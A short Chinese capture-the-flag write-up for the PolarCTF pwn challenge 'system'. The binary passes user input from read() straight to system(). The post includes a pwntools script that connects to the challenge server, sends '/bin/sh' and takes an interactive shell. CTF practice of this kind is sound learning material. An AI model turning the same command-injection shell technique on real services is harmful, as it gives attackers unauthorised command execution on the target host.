当前位置: 首页 > news >正文

【PolarCTF】system

news 2026/6/7 20:51:41

检查下保护,开启了栈保护

将文件拖入IDA,发现read读取buf字符串,然后system会直接执行,那么我们直接输入/bin/sh来获取权限

exp如下

from pwn import * # 1.95.36.136 2110 r = remote("1.95.36.136","2110") r.sendline("/bin/sh") r.interactive()

http://www.jsqmd.com/news/624658/

相关文章:

  • AI技术变革下的SEO关键词优化新模式探索
  • 别再怪PaddleOCR了!可能是你的图片‘喂’得不对:聊聊OCR预处理的门道
  • 重构实战:如何识别并修复‘被拒绝的遗赠’代码异味
  • 【PolarCTF】简单溢出
  • Maomi.In | .NET 全能多语言解决方案乒
  • 如何轻松实现EMQX消息持久化?emqx_persistence_plugin完整指南
  • Burpsuite之暴力破解+验证码识别 | 添柴不加火辟
  • 【仅限首批200家认证企业开放】:基于ISO/IEC 23053标准的AI原生软件流水线成熟度评估矩阵(含自动打分CLI工具链)
  • 知识星球内容本地化:从云端依赖到个人知识库的转变
  • 如何让微信聊天记录成为你的个人数字资产?WeChatMsg完整解决方案
  • CAD工件图和实物图对比识别项目总结
  • 使用小龙虾来操作猿编程的遥控车懦
  • AI微服务治理为何频频崩溃?:揭秘OpenTelemetry+Istio在LLM推理链路中的7类隐性故障模式
  • X-AnyLabeling从源码到打包:一份给开发者的定制化部署指南(Windows/Linux/MacOS全平台)
  • 营销自动化数据驱动 - 多源数据 OLAP 架构演进胶
  • 为什么92%的AI原生应用在出海时本地化失败?——基于27个真实项目复盘的5维失效根因图谱
  • IDEA里用PlantUML画类图,为啥我装了插件还是不行?手把手教你搞定Graphviz配置
  • WindRunnerMax毖
  • Ryzen处理器SMU深度调试:5大核心技术原理与性能调优实战
  • 清北博雅考研:全科全阶全场景,真正一站式综合考研辅导标杆
  • 【C】顺时针螺旋移动法
  • 嵌入式c语言——关键字其6
  • Mac/Win双平台指南:最新VMware Fusion 13及Workstation Pro 17从博通官网下载全流程
  • 【央行科技司内部评估首曝】:AI原生支付系统已通过沙盒压力测试——但92%企业正因这4个认知盲区错失接入窗口期?
  • VBA-JSON终极指南:Excel数据与JSON格式互转的完整解决方案
  • Mermaid Live Editor:代码即图表的新一代可视化开发体验
  • Android Safety 系列专题【篇七:Android AVF机制】
  • fasdfsadfsda
  • 2025届必备的十大降重复率助手解析与推荐
  • Ozon卖家最头疼的8大问题,Captain AI一键解决